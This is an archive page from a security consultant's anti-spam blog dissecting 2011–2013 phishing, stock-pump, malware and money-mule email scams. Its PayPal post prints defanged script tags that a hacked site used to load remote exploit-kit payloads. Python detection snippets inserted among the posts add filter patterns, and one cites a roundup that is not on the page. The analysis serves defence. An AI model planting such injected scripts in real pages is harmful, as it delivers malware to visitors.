Continue reading "Spam and email threat roundup for May 19 - 26, 2013" »

May 21, 2013

PHISHING SCAM: "Upgrade your Comcast Account now!"

PHISHING ALERT FOR COMCAST CUSTOMERS

If you are a Comcast Internet service customer and use a Comcast email account, you too may receive a targeted email scam similar to the one I received tonight, with the subject: "Upgrade your Comcast Account now!" The important portion of the body text follows.

Service Update

Dear Comcast Customer,

You are required to update your Comcast Account by subscribing to our Security Center.

If you not perform the update now (sic), your account will be placed on hold.

In order to update your account click here.

There is a hyperlink around the words "click here" that goes directly to a compromised web hosting account where one will find images and words stolen from a real Comcast login page. There is a login form that asks Comcast customers to type in their Comcast user name and password to confirm their identity. Anybody doing so will be handing over their Comcast Internet and Xfinity credentials to cybercriminals in Europe. This will allow them to log in to your account and gain access to everything you have entered, including personally identifiable information and billing details.

This appears to be a targeted attack against Comcast.net email account holders. I have many other domain accounts and none of them has received this scam message. I pray that this information gets in front of your eyes before the phishing email does and stops any of you from mistakenly thinking this is a legitimate message from Comcast.

Continue reading "PHISHING SCAM: "Upgrade your Comcast Account now!"" »

May 15, 2013

Pump & dump scammers invent more fake news for GTRL

If you have been following my recent Pump and Dump expose, you are aware that the people running the email scam campaign pumping up GTRL have been lying, in order to draw in (sucker) more investors. Today, they ramped up their lies another notch and are falsely claiming that Get Real USA is being bought out. Not so!

If you search for any actual news from Get Real USA (GTRL), all you will find is this recent notice, posted by them on May 9, 2013:


The Company affirms that it has not participated in, condoned nor given permission to any company or individual to send unsolicited e-mail, text messages or any other communications involving the Company, its common shares or any of its products, that individuals may have received over the past week. Investors are cautioned not to rely on the statements made in these types of campaigns, when considering the Company as an investment. The Company does not endorse the use of these emails or promotions to create a market for its stock. Frank Weber President and CEO stated that neither the company management, company board of directors or anyone associated with Get Real USA has been authorized to issue any such communications and all recipients of such should disavow any and all of such communications.

Continue reading "Pump & dump scammers invent more fake news for GTRL" »

May 9, 2013

Pump & dump penny stock scam leads to an otcmarket skull & crossbones

I just had to write this brief follow-up to an article I began on Monday, May 6, 2013. I have been outing spammers running pump and dump scams on penny stocks, exposing the way they invent fake news reports and make stock value projections that don't jibe with reality.

The scam being perpetrated this week involves a penny stock with the symbol GTRL. The company has already placed an unmissable notice on its landing page, indicating that they are in no way involved with this stock pump and dump spam campaign.

Nonetheless, the idiots behind this latest onslaught of botnet-sent pump and dump scam emails are doing their damnedest to enlist more suckers into purchasing GTRL penny stock. Almost all of the spam messages in my junk folder since last weekend are classified as Pump And Dump Scams by the anti-spam filters I write for MailWasher Pro users and myself.

Those who fall for the terrible English grammar and spelling mistakes in those spam messages would probably go to a place like otcmarkets.com to purchase large blocks of stock in the spammed company. Well, tonight I humored myself and visited the otcmarkets quotes page for GTRL (Get Real Media - a film company). To the right of the closing price, which is down 18.52% from the measly opening price of $.0135 to just $.011, for all potential fools to see, is a black skull and crossbones symbol! Hovering over that skull symbol (on a desktop or laptop computer, not a smartphone) results in the following overlaid text display:

Continue reading "Pump & dump penny stock scam leads to an otcmarket skull & crossbones" »

May 7, 2013

How pump and dump scammers lie to sucker investors

Yesterday, May 6, 2013, I published an article on this blog exposing the latest pump and dump scam making the rounds. The scam involves a true "Penny Stock" that is only worth 1 to 1.5 cents US. Despite there being no news from the company, GTRL, scammers have been pumping the hell out of it since the middle of last week.

While there has been no news from the company itself, other than a warning about the pump and dump scam using their symbol, there has been a flurry of fake news coming via the botnet used to send out this spam blast. This news and reports about the trading value increases in GTRL are all phony. I will expose this below.

In the spam messages I intercepted last night and this morning, the scammers claim, with poor spelling and grammar, that the stock is rising in value quickly and will soon reach a certain extraordinary high. Take a look at their (false) claims, after which I will show you what the actual trading charts reveal to be the facts.

Continue reading "How pump and dump scammers lie to sucker investors " »

May 6, 2013

GTRL disavows current penny stock email scams

Since the predicted demise of the SCXN penny stock pump and dump scam, one week ago, a new stock scam has been making the rounds in its place. The new pump and dump of the week has the symbol GTRL (Get Real USA).

GTRL is a true "Penny Stock" - with a trading value of just one cent last week. Since the pump and dump scam began today, the price increased a few percentage points to about 1.5 cents. The (Eastern European) scammers who bought up thousands of shares at a penny, in advance, are hoping to pump up the value to 5 or 6 cents, then dump all of those shares.

According to the text in the email scams, this company is about to make a major announcement that will cause the value of its worthless stock to shoot up. This is total nonsense. The only news published on the actual Get Real Movies website is a disclaimer of them having anything to do with the current stock scam. The following is quoted from the Get Real landing page...


NOTICE! It has come to the management's attention that the GTRL trading symbol has been associated with certain spam emails. The company is working to discover the source of the emails at this time.

GET REAL USA AND ITS OFFICERS, DIRECTORS, CONSULTANTS OR ANY OF ITS AFFILIATES HAVE NOT AUTHORIZED ANY EMAILS TO BE SENT ON THE COMPANY'S BEHALF.

Please do your own due diligence and consult with your financial adviser prior to making any decision related to the purchase of Get REAL USA securities. GTRL is considered to be a "penny stock". Visit the company's most recent public disclosure statements and relevant company information at: www.otcmarkets.com


Continue reading "GTRL disavows current penny stock email scams" »

April 28, 2013

SCXN pump and dump scam fails again, as predicted

One week ago I wrote about a penny stock email scam, pumping up the stock value of a little known company called Scout Explorations; a.k.a. SCXN. I predicted that this pump and dump scam would have the same outcome as almost all such schemes, and it did. All of the gains seen have been wiped out and the value has dropped to where it was last Monday, at the open of trading.

Last Monday, when the scam was very fresh, a lot of people bought shares, driving the value up to 41 cents. This number held for about two days, then began to drop as the early investors cashed out, again as I predicted they would do. At the close of trading on April 26, this pink penny stock was selling for just 28 cents, after dropping all the way to 25 cents. People who bought into the scam on Monday morning made their money back if they sold on Friday. All the rest lost money, except for one group.

The one group who undoubtedly gained money were the ones who bought thousands of shares of SCXN stock while it was at 5 to 15 cents, which it was for many months. The value only began to go up as a result of an offshore email spam run, coming from computers in Belarus. These folks would have earned themselves about 25 to 35 cents a share profit, as they sold (dumped) all of their stock on Tuesday, April 23. You can follow the hourly, daily, weekly, monthly or yearly activity of this penny stock on this Fox Business News page.

Continue reading "SCXN pump and dump scam fails again, as predicted" »

April 21, 2013

Pump and Dump Stock Scam of the Weekend: SCXN

Since Friday, April 19, 2013, I have received over two dozen email spam messages touting a penny stock with the initials SCXN. The purpose of these emails is to pump up interest in this stock and get as many new investors as possible to buy into it on Monday, before it crashes.

Once a predetermined price has been reached, the people already holding the majority of the shares, who also created this scheme, will cash out (dump), leaving all of the other later investors holding stock worth much less than they paid for it.

In order to try to fool spam filters, the authors add an underscore between varying letters in the symbol of the stock being spammed. So, instead of seeing the full abbreviation: SCXN, you would see S_CXN, or SC_XN, or SCX_N. No legitimate email message from a real adviser would need to try to trick spam filters in this manner.
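The underscore trick described above, together with the random From-address pattern from the June 9, 2013 roundup earlier on this page, written as two detection rules in Python. This is an added example, not the MailWasher Pro filters the author publishes; the watchlist holds the symbols named on this page, and the sample From address and message body are constructed.

```python
import re
from email.utils import parseaddr

# Watchlist of symbols named on this page as pump-and-dump targets.
PUMPED_SYMBOLS = {"SCXN", "GTRL", "BYSD"}

# Local part of 10 to 12 random letters followed by exactly three digits, the shape of
# the bogus From addresses in the June 2013 greencoffee spam run.
RANDOM_LOCAL_PART = re.compile(r"^[A-Za-z]{10,12}[0-9]{3}$")

# An all-caps token with at most one underscore somewhere inside it: SCXN, S_CXN, SC_XN, SCX_N.
OBFUSCATED_TOKEN = re.compile(r"\b([A-Z]{1,4}_?[A-Z]{1,4})\b")


def random_sender(from_header: str) -> bool:
    """True when the From address has the random-letters-plus-three-digits local part."""
    _display_name, addr = parseaddr(from_header)
    local, _, domain = addr.partition("@")
    return bool(domain) and RANDOM_LOCAL_PART.match(local) is not None


def obfuscated_tickers(text: str) -> set:
    """Return watchlisted symbols present in text, with or without an inserted underscore."""
    found = set()
    for match in OBFUSCATED_TOKEN.finditer(text):
        symbol = match.group(1).replace("_", "")  # S_CXN -> SCXN
        if symbol in PUMPED_SYMBOLS:
            found.add(symbol)
    return found


def classify(from_header: str, subject: str, body: str) -> list:
    """Names of the rules that fire, using the category names the filters on this page use."""
    hits = []
    if random_sender(from_header):
        hits.append("Known Spam [From]")
    if obfuscated_tickers(subject + "\n" + body):
        hits.append("Pump And Dump Scam")
    return hits


# Constructed samples, not captured mail.
GREENCOFFEE_FROM = "iWellHealth <QwErTyUiOpAs123@health-offer.example>"
SCXN_BODY = "S_CXN is set to explode on Monday! Grab SC_XN now before everyone else does."

if __name__ == "__main__":
    print(classify(GREENCOFFEE_FROM, "You have 24 hours to act", "green coffee offer"))
    print(classify("Jane Doe <jane.doe@example.com>", "Hot stock pick", SCXN_BODY))
```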

Pump and Dump scams have been around for many years and used to be sent out by newspaper and direct mail advertisements. But, with the popularity of the Internet and the availability of cheap spam email services, based in Belarus, Kazakhstan, The Ukraine, Russia, Bulgaria and Latvia (to name but a few), these schemes can be sent to tens of millions of potential dupes for several hundred dollars.

If you have multiple email accounts and they are already on spam databases, you will receive similar spam messages in each account. Or, if you have just one email account, you will certainly see multiple versions of the current pump and dump promotion on the same weekend. The spammers send multiple messages to the same or related accounts in order to drum up as much illicit profit as possible, in the shortest time. This is because the spam runs usually happen on the weekend, while the stock exchanges are closed. When trading opens on Monday morning, the people who got tricked into investing in the stock scam of the weekend will pour money into penny stocks.

Volume is as important as price to the scammers running these schemes. High volumes of activity on Mondays can give false confidence to some holdouts and cause them to join the feeding frenzy. Once the original stock holders see the price rise to the agreed upon mark, they all cash out at the same time. This causes the value of the remaining stock to drop quickly. By the time trading has halted, these stocks are often trading at a few cents above the starting price that existed at the open of the trading day.

Continue reading "Pump and Dump Stock Scam of the Weekend: SCXN" »

March 20, 2013

DHL delivery report email scam delivers malware 'packages'

As I predicted on March 17, this week is off to a running start for email-borne malware scams. Today, we are seeing an ongoing spam blast with the subject: DHL delivery report - which contain malware attachments.

Here are some identifying words and phrases you should be looking out for, when (not if) you receive this email message.

Subject: DHL delivery report (or similar)
From: "(A spoofed personal name) - DHL regional manager" <[email protected]>

Body Text: (dozens of lines of HTML precede readable text)


DHL notification
Our company's courier couldn't make the delivery of parcel.
REASON: Postal code contains an error.
LOCATION OF YOUR PARCEL: New York
DELIVERY STATUS: sort order
SERVICE: One-day Shipping
NUMBER OF YOUR PARCEL: ETBAKPRSU3
FEATURES: No
Label is enclosed to the letter.
Print a label and show it at your post office.

An additional information: If the parcel isn't received within 15 working days our company will have the right to claim compensation from you for it's keeping in the amount of $8.26 for each day of keeping of it.
You can find the information about the procedure and conditions of parcels keeping in the nearest office.
Thank you for using our services.
DHL Global

The attachment is not a printable label, as claimed, but is the Bredolab botnet downloader/installer.

Continue reading "DHL delivery report email scam delivers malware 'packages'" »

October 17, 2012

Watch out for more malware link email scams this week

Malware purveyors are busy this week, distributing email scams containing either links to malware or attachments carrying it. Thus far, since Monday this week, I have seen several company brands being spoofed to try to fool recipients into clicking on links leading to the Blackhole or Phoenix exploit kits.

These exploit kits are professionally written to take advantage of vulnerabilities in commonly deployed software that interacts with web browsers or email clients. The primary target is Java technology, which is now owned and maintained by Oracle.

Typically, the first round of scams arrive on Monday mornings and spoof business brands such as Intuit, or UPS, or USPS, or scans from an HP ScanJet, or fake invoices, or bogus schedules for company meetings. All of the above arrived in my inbox on Monday and Tuesday. On Wednesday, the brands being spoofed are UPS, LinkedIn and Facebook. They follow particular scam patterns that give them away to people who are aware and use caution before clicking on links.

The Tell-Tale Patterns

Continue reading "Watch out for more malware link email scams this week" »

June 5, 2012

Fake Join my network on LinkedIn email scam has links to BlackHole Exploit Kit

For the past few days I have been receiving email scams claiming to come from LinkedIn, some of which are password reset scams, with the latest being an invitation to join somebody's LinkedIn network. Both are scams, with links leading directly to a compromised website that is hosting the BlackHole Exploit Kit.

Let's take a look at the most recent LinkedIn scam: "Join my network on LinkedIn"

The email Subject is: Join my network on LinkedIn.
The (spoofed) From (sender) address is: [email protected].
The Reply_to address is spoofed as: [email protected]
The first Received from line, from the final mail server is:
Received: from [182.182.16.190] (port=1664) - which is definitely not LinkedIn.com. Further details reveal that the message was sent from mail.bucklerboots.com, not LinkedIn.com.

The message body is loaded with images drawn from LinkedIn and text containing the following come-on:
"Mimi Kauffman has indicated you are a Friend ... I'd like to add you to my professional network on LinkedIn.- Mimi Kauffman ... View invitation from Mimi Kauffman (has payload link) ... WHY MIGHT CONNECTING WITH Mimi Kauffman BE A GOOD IDEA? Mimi Kauffman's connections could be useful to you After accepting Mimi Kauffman's invitation, check Mimi Kauffman's connections to see who else you may know and who you might want an introduction to. Building these connections can create opportunities in the future."

My apologies to Mimi Kauffman, whoever you are. Contrary to the claim in the message, we are NOT friends and do not know each other. Spammers are using your harvested name in scams, just like they might be using mine or anybody else's. It is a tactic used to gain trust; a con game; "a Joe Job."

The text is much like what a LinkedIn member would receive in a legitimate request. Spammers join LinkedIn so they can gather templates from actual email messages, for use in scam campaigns. Then, they substitute their own poisoned links for LinkedIn links, to drive victims to booby-trapped websites.

Continue reading "Fake Join my network on LinkedIn email scam has links to BlackHole Exploit Kit" »

May 25, 2012

New money mule email scams lead to infamous Rock Cruit Management

Today, while reviewing my auto-deleted spam email messages, I found one that I decided to take a closer look at. It is an obvious Money Mule recruitment scam (to spam hunters like me), with the subject: "Re : Re : Please Complete Your Job Application." Let's see where it leads, shall we?

First of all, everything in the headers is garbage. Throw them out, except to report the unwitting sender to SpamCop, which I did. The sender was an open proxy in Greece. The spamvertised link was to a URL shortener service hosted in China.

The bait was as follows:


The salary available for open openings range from $35.77 /hr to $57.62 per hour.
Prior being considered, we will first need you to formally apply.
Please go here to begin the process:


I have seen these exact same words, with only slight variations, for a year or longer. In fact, I write spam filters for MailWasher Pro users which detect these phrases and others, to auto-delete such scams.

I decided to follow the URL shortened link and see where it leads.

Continue reading "New money mule email scams lead to infamous Rock Cruit Management" »

May 24, 2012

Anatomy of a PayPal email scam leading to malware

Cyber-criminals are once again ramping up their email scam campaigns to deliver messages with links to malware servers they control. One of the recent scams, happening this week, is a PayPal Payment scam, with links leading to an exploit attack kit.

The most recent PayPal scam arrives in your Inbox with the Subject: "You sent a payment" and a spoofed From address: "[email protected]" <[email protected]>. However, if you were to take a look at the normally hidden header information, you would see that the email came from some other unrelated website. The PayPal scam I am looking at came from Brazil:

Received: from [187.56.96.53] (helo=telesp.net.br).

See my article from 2006 for suggestions on how to display email headers.
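Both this PayPal message and the LinkedIn invitation above carry a topmost Received line whose host has nothing to do with the brand in the From field. The following is an added example (not the author's code) that pulls the originating hop out of a raw message and compares it with the From domain; the header samples are constructed from the fragments quoted in the two posts, and the mx.example.net receiving host, the dates, the From addresses and the legitimate-looking sample are assumptions.

```python
import email
import re
from email import policy
from email.utils import parseaddr

IP_IN_BRACKETS = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
FROM_HOST = re.compile(r"^from\s+([A-Za-z][\w.\-]*)", re.IGNORECASE)
HELO = re.compile(r"helo=([\w.\-]+)", re.IGNORECASE)


def originating_hop(raw_message: str):
    """(ip, hostnames) from the topmost Received header, the one written by the final
    receiving server; that IP is the host that actually connected to deliver the mail."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    received = msg.get_all("Received") or []
    if not received:
        return None, []
    top = str(received[0]).strip()
    ip_match = IP_IN_BRACKETS.search(top)
    names = []
    host_match = FROM_HOST.match(top)
    if host_match:
        names.append(host_match.group(1).lower())
    names += [h.lower() for h in HELO.findall(top)]
    return (ip_match.group(1) if ip_match else None), names


def from_domain(raw_message: str) -> str:
    """Domain part of the (possibly spoofed) From address."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    _display_name, addr = parseaddr(str(msg["From"] or ""))
    return addr.rpartition("@")[2].lower()


def sender_mismatch(raw_message: str) -> bool:
    """True when no name attached to the originating hop belongs to the From domain.
    Heuristic only: a brand that sends through a third-party mail provider trips it too,
    so treat a hit as a reason to check SPF/DKIM results, not as a verdict by itself."""
    domain = from_domain(raw_message)
    ip, names = originating_hop(raw_message)
    if not domain or ip is None:
        return False
    return not any(n == domain or n.endswith("." + domain) for n in names)


# Constructed header samples modelled on the fragments quoted in the two posts;
# mx.example.net, the dates and the From addresses are assumptions.
LINKEDIN_SCAM = """\
Received: from [182.182.16.190] (port=1664 helo=mail.bucklerboots.com)
  by mx.example.net with esmtp; Tue, 5 Jun 2012 10:00:00 +0000
From: LinkedIn <noreply@linkedin.com>
Subject: Join my network on LinkedIn

View invitation from Mimi Kauffman
"""

PAYPAL_SCAM = """\
Received: from [187.56.96.53] (helo=telesp.net.br)
  by mx.example.net with esmtp; Thu, 24 May 2012 09:00:00 +0000
From: PayPal <noreply@paypal.com>
Subject: You sent a payment

You sent a payment for $334.85 USD to Otis Bauer
"""

# A legitimate-looking sample whose originating host sits inside the From domain.
LEGIT_SAMPLE = """\
Received: from mail-a.linkedin.com ([203.0.113.10])
  by mx.example.net with esmtp; Tue, 5 Jun 2012 11:00:00 +0000
From: LinkedIn <noreply@linkedin.com>
Subject: Join my network on LinkedIn

A real invitation
"""

if __name__ == "__main__":
    for label, raw in (("LinkedIn scam", LINKEDIN_SCAM), ("PayPal scam", PAYPAL_SCAM), ("legit", LEGIT_SAMPLE)):
        print(label, originating_hop(raw), "mismatch" if sender_mismatch(raw) else "ok")
```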

The PayPal scam message body text is meant to both poke the curiosity of the recipient (by the dollar amount they allegedly sent) and to delay their checking into their PayPal accounts to see if they did make such a payment. Here is how the crooks accomplish these important tasks:


You sent a payment Transaction ID: 2T004487YM209135A
Dear PayPal User, You sent a payment for $334.85 USD to Otis Bauer (or another name). Please note that it may take a little while for this payment to appear in the Recent Activity list on your Account Overview...

This payment was sent using your bank account. By using your bank account to send money...


The call to action they want victims to perform is NOT to log in to their PayPal accounts to investigate this scam (see the sentence above about the payment taking a while to appear), but to click on poisoned links wrapped around keywords in the email message body. These links are wrapped around every word that a PayPal user might normally expect to be available for seeing details about their account. The linked words were as follows:

  • 2T004487YM209135A

  • View the details of this transaction online

  • Help Center | Resolution Center | Security Center

  • h**ps://www.paypal.com/us/cgi-bin/webscr?cmd=_history (not URL in link)

  • h**ps://www.paypal.com/us/cgi-bin/webscr?cmd=_contact_us (not URL in link)


Each one of the above anchor words was wrapped in a link to a compromised website that contained the following contents (placed there when it got hacked):

WAIT PLEASE
Loading...
<script type="text/javascript" src="h**p://REMOVED.com.tr/fu25e3pr/js.js"></script>
<script type="text/javascript" src="h**p://REMOVED-epices.com/X1RrZw4G/js.js"></script>
<script type="text/javascript" src="h**p://REMOVED.com.au/Xsqgw1AK/js.js"></script>

Continue reading "Anatomy of a PayPal email scam leading to malware" »

May 16, 2012

Spoofed 'Bill Me Later' email has links to 20 Blackhole exploit websites

This article is about cybercriminals taking email exploit attacks to a new level. Tonight, I processed an email scam (to SpamCop) that claimed to come from a service known as 'Bill Me Later' - detailing an online payment I was supposed to have made over the phone. Except, my name is not Dr. Mary Olsen, MD!

The message, which was carbon copied (CC) to dozens of other recipients (whose email addresses were viewable in plain text), started off with the following totally fake text:

"Thank you for making a payment over the phone! We've received your Bill Me Later® payment of $60.12 and have applied it to your account."

The scam goes on to list various account numbers and (fake) payment details. It was also loaded with images and clickable links (20) to view many details, including:

Manage your account, Make a payment, View statements, Account Summary, Home, Make a Payment, About Bill Me Later, Offer, Directory, View Statements, Merchant Sign Up, Store, View Account, Summary, FAQs, Register Account
and 4 image links.

What is astoundingly different about this scam is not just the unusually high number of links leading to an exploit kit, but the fact that they all led to different domains. Normally, I see one or two domains used in hostile link scams. Twenty different compromised domain links is a new record for me.

Each one of these 20 links (see compromised website list) leads to a different website, to a sub-directory (folder) containing 8 mixed case alphanumeric characters, then, /index.html. Here is one sample URL (deactivated for your safety): h**p://webprof.ro/Tv2YU8u6/index.html
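The two link tricks described in this post and the PayPal post above, display text that reads as a PayPal URL while the href points at another host, and hrefs of the form /<8 alphanumerics>/index.html spread across many domains, as an added HTML-email link check (example code, not from the original posts). The sample body is constructed: the site-one.example style hosts and the Ab3dEf9h folder stand in for the compromised domains, while the transaction ID and PayPal URLs are those quoted above.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Eight mixed-case alphanumerics then /index.html, the landing path shape seen on all 20 links.
LANDING_PATH = re.compile(r"^/[A-Za-z0-9]{8}/index\.html$")


class AnchorCollector(HTMLParser):
    """Collect (visible text, href) for every <a> element in an HTML email body."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append(("".join(self._text).strip(), self._href))
            self._href = None


def host_of(url: str) -> str:
    """Lower-cased hostname of a URL; bare 'www.example' text is treated as a URL too."""
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


def looks_like_url(text: str) -> bool:
    return re.match(r"^(https?://|www\.)", text, re.IGNORECASE) is not None


def analyse_links(html: str) -> dict:
    """Flag anchors whose visible URL names a different host than their href, hrefs with the
    exploit-kit landing path shape, and collect the distinct hosts the message points to."""
    parser = AnchorCollector()
    parser.feed(html)
    parser.close()
    findings = {"display_mismatch": [], "landing_pattern": [], "hosts": set()}
    for text, href in parser.anchors:
        href_host = host_of(href)
        findings["hosts"].add(href_host)
        if looks_like_url(text) and host_of(text) != href_host:
            findings["display_mismatch"].append((text, href))
        if LANDING_PATH.match(urlsplit(href).path):
            findings["landing_pattern"].append(href)
    return findings


# Constructed message body; hosts and folder name are placeholders, not the real compromised sites.
SAMPLE_BODY = """
<p>You sent a payment Transaction ID:
<a href="http://site-one.example/Ab3dEf9h/index.html">2T004487YM209135A</a></p>
<p><a href="http://site-two.example/Ab3dEf9h/index.html">View the details of this transaction online</a></p>
<p><a href="http://site-three.example/Ab3dEf9h/index.html">https://www.paypal.com/us/cgi-bin/webscr?cmd=_history</a></p>
<p><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_contact_us">https://www.paypal.com/us/cgi-bin/webscr?cmd=_contact_us</a></p>
"""

if __name__ == "__main__":
    result = analyse_links(SAMPLE_BODY)
    print("display/href host mismatches:", result["display_mismatch"])
    print("landing-path links:", result["landing_pattern"])
    print("distinct hosts:", sorted(result["hosts"]))
```

A message whose links all share one landing path shape but fan out over many hosts is the Bill Me Later pattern; a single anchor whose visible URL and href disagree is enough to treat the PayPal-style message as phishing.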

Continue reading "Spoofed 'Bill Me Later' email has links to 20 Blackhole exploit websites" »

May 7, 2012

Really lame and blatant Nigerian 419 scam

Today, I received an email containing a Nigerian 419 scam that while laughable for its horrible spelling and punctuation, makes an upfront demand for payment. Normally, these scams hide the fact that victims are asked to pay in advance before the (fake) hundreds of thousands of dollars will be released to the beneficiary (victim).

Let's take a look at this scam from a curiosity point of view.

First of all, the sender has covered his tracks by using compromised email relaying PCs in a botnet. Two computers were used, both belonging to US residents. One belongs to an organization named "Secured Private Network" - which is obviously not so well secured! The second relay occurred via an open relay in a mail server belonging to CrystalTech Web Hosting.

The return path was interesting. It used a (possibly spoofed) account on a Ukrainian domain: [email protected]. However, the From address shows [email protected], which is obviously spoofed.

The message body claims to be from the "United states ambassador to nigeria
Ambassador terence mccauley" - yet it is filled with incorrect grammar, bad spelling and letter cases. I have to believe that any school kid in the USA knows that titles, countries and personal names always have the first letter capitalized.

The scammer claims to have plans to be: "coming to your country for an official meeting and i will be bringing your funds of ($500,000:00) FIVE HUNDRED THOUSAND UNITED STATES DOLLARS {bank draft} along with me." He goes on to demand an up front payment of $250 processing fee! "the cost of registering it is $250 USD the fee must be paid in the next 48 hours via western union."

Finally, to add insult to injury, the scam contains this outrageous statement:


Please, if you know you will not or can not send the requested $250 USD, please, dont bother replying this mail.

You can read the full text of this 419 scam on my SpamCop report.

It is the up front, advance fee demands that gave these scams the name 419 scam. You see, section 419 of the Nigerian Penal Code makes it a serious offense to commit financial fraud involving advance fees. Yet, Nigerians go to Internet Cafes every day and mail out thousands of such scams to people in all parts of the World, but especially English speaking people in North America, the United Kingdom and the lands down under.

Never reply to a Nigerian scammer and never give them your phone number! There is no 500 Gs waiting for you, and you are not the beneficiary of anybody who died and left millions in a Nigerian bank. They will bleed you out of all your money with new fees and bribes and never send you the promised funds (because they do not exist). This has happened over and over to greedy people who fall for such scams. W.C. Fields once said "Never wisen up a chump or give a sucker an even break." That is exactly how Nigerian 419 scammers behave. They target the elderly as well as business owners and town clerks.

November 5, 2011

Work at home Money Mule job scams abound with holidays approaching

For the last week or so, I have seen a steady increase in the number of illicit work at home job scams arriving by email. So far, just this morning, I have seen 5 different subjects, with slightly different "reference" numbers, all spoofed as coming from one of my own email addresses. This coincides with the approaching Black Friday and Christmas shopping season in the US and Canada.

I have no doubt that my readers are also seeing more mysterious online job offers arriving by unsolicited email (spam). With so many of us struggling to make ends meet, in a middle that keeps getting farther apart, some of you may be tempted to reply to such an offer. Please don't do it! It is a scam and will get you in big trouble. Let me explain...

Work-at-home job scams have been around for well over a dozen years. In recent years the people running these scams have found it more profitable to recruit hapless individuals, in desperate search of a job, into a money laundering or stolen-goods reshipping scheme than to cheat them out of a few dollars over a fake envelope-stuffing or medical-billing position.

What is a money mule?

A Money Mule is a person who knowingly or unknowingly receives stolen or illegally obtained funds, allows them to be deposited into their own bank account, then transfers that money from their bank to another one located in another country. This act is known as money laundering. The illicit money comes to them by way of banking key loggers, like Zeus or SpyEye, or from illegal activities like arms or drug sales, or extortion. Sometimes the money is laundered on behalf of known terrorist organizations.

What is a reshipper scam?

A reshipper scam is one where a person is recruited for a job in which they receive physical goods delivered by the post office or a parcel delivery service, repackage or re-label them, then reship them to a specified foreign destination. The reshipper may or may not be aware that these goods were obtained with stolen credit or debit cards.

In most civilized, law-abiding countries, serious laws are broken by all participants in both of these "job" schemes. Money Mules are easily tracked down when victims notify the police about money illegally transferred out of their bank accounts, because the banks have a money trail for every transfer. Most Money Mules are told to set up a direct deposit account to receive and transfer the stolen funds. As I mentioned earlier, this is known as "Money Laundering", which is a Federal felony in the USA and Canada, punishable by lots of time in a Federal Penitentiary and huge fines.

Reshipping job participants are involved in moving stolen merchandise (from auction sites, office supply, computer and electronics stores, catalog stores, etc.) to offshore recipients. All reshipping mules are guilty of felonies for trafficking in stolen goods.



About the author

Wiz's Blog is written by Bob "Wiz" Feinberg, an experienced freelance computer consultant, troubleshooter and webmaster. Wiz's specialty is in computer and website security. Wizcrafts Computer Services was established in 1996.


This weblog is licensed under a Creative Commons License.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.
Powered by Movable Type
